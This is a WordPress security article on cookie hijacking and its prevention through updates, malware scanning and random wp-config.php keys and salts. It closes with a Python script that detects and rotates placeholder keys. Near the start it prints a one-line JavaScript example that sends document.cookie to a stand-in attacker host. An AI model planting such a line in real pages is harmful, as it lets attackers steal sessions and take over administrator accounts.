This article explains cookie hijacking: the theft of session cookies from logged-in WordPress users.

What are cookies?

A cookie is a mechanism that temporarily stores various information about a user accessing a site in the user’s browser for each domain (or page).
Typical information temporarily stored in a cookie includes the following:

Information about whether you are logged in to the site, such as your login ID and password.

Information for access analysis.

Information about the products in your shopping cart (in many cases only the cart ID is stored in the cookie, and the information about the products in the cart is stored on the server side), etc.

If a hacker can steal the cookie’s “information about whether you are logged in to the site, your login ID and password, etc.”, the hacker will be able to log in to the site.

Methods and Dangers of Cookie Hijacking

Hackers can tamper with a WordPress site and embed the following code into it; when a user logged in with administrator privileges executes the malicious script, it sends that user’s cookie information to an external server, allowing the hacker to log in as the administrator. In this way, cookie theft increases the risk of the site being hacked.

"https://hackers-site-url/?cookie=" + escape(document.cookie);

In practice, this script is obfuscated or a combination of various techniques is used to transmit it.

However, there are some hurdles a hacker must clear to run this script and take over the WordPress administrator login.

1 The site must be tampered with to embed this script (or the user must be made to follow a cross-site scripting link).

2 The user who runs the script must be logged in as an administrator.

3 WordPress cookie information is encrypted using AUTH_KEY and SECURE_AUTH_KEY in wp-config.php for each login, so obtaining the cookie does not guarantee that the hacker can log in.

By strengthening these hurdles 1, 2, and 3, cookie hijacking can be prevented.

Preventing Cookie Hijacking

Plug vulnerabilities in the site
To address hurdle 1, close vulnerabilities in WordPress core and in its themes and plugins so that your site cannot be defaced or used for cross-site scripting.
The easiest and most effective way to do this is to update WordPress, your theme and your plugins promptly whenever updates are released.
Also remove unused themes and plugins from the server.

Reference
5 Free WordPress Security Measures

Also, scan your site for malware that may have already been embedded in your site and remove it if found.
Free WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]

Properly encrypt cookies
To address hurdles 2 and 3, set the cookie encryption keys in wp-config.php so that a hacker cannot use a stolen cookie to log in as administrator. The keys are:

'AUTH_KEY'
'SECURE_AUTH_KEY'
'LOGGED_IN_KEY'
'NONCE_KEY'
'AUTH_SALT'
'SECURE_AUTH_SALT'
'LOGGED_IN_SALT'
'NONCE_SALT'

Set each of these to a long, meaningless, random string. These definitions are found in wp-config.php, just below the comment:

* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.

You can generate these automatically by opening the salt generation service linked from that comment, https://api.wordpress.org/secret-key/1.1/salt/, and pasting the output into wp-config.php.

Do not leave the default “put your unique phrase here”. Once a hacker has stolen a cookie, this known default key lets him forge a cookie that logs him in as administrator as many times as he wants.
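As an added example (not code from the article), the following Python script checks a wp-config.php for keys that still hold the default placeholder and rotates all eight keys and salts with locally generated random values, which also invalidates every existing login cookie, stolen ones included. The wp-config.php contents below are a constructed sample; generating the values locally with the `secrets` module is an assumed substitute for the WordPress.org service mentioned above.

```python
import re
import secrets
import string

# Constructed sample: the key/salt section of a fresh wp-config.php still at its defaults.
SAMPLE_WP_CONFIG = """<?php
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
define('DB_NAME', 'wordpress');
"""

WP_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
           "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"

# Matches define('AUTH_KEY', '...'); for any of the eight names; the value is group 2.
DEFINE_RE = re.compile(r"define\(\s*'(" + "|".join(WP_KEYS) + r")'\s*,\s*'([^']*)'\s*\);")

# Printable ASCII without quote, backslash (they would break the PHP literal) or space.
ALPHABET = "".join(c for c in string.printable if c.isprintable() and c not in "'\\ ")


def find_weak_keys(config_text: str) -> list:
    """Names of keys that are missing, still the placeholder, or shorter than 32 characters."""
    present = dict(DEFINE_RE.findall(config_text))
    weak = []
    for name in WP_KEYS:
        value = present.get(name, "")
        if value == PLACEHOLDER or len(value) < 32:
            weak.append(name)
    return weak


def generate_secret(length: int = 64) -> str:
    """A CSPRNG-generated secret, the same length as the WordPress.org service returns."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def rotate_keys(config_text: str) -> str:
    """Replace every key/salt value with a fresh secret; all existing login cookies become invalid."""
    return DEFINE_RE.sub(lambda m: f"define('{m.group(1)}', '{generate_secret()}');", config_text)


if __name__ == "__main__":
    print("weak keys before:", find_weak_keys(SAMPLE_WP_CONFIG))
    print("weak keys after: ", find_weak_keys(rotate_keys(SAMPLE_WP_CONFIG)))
```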

We hope this helps.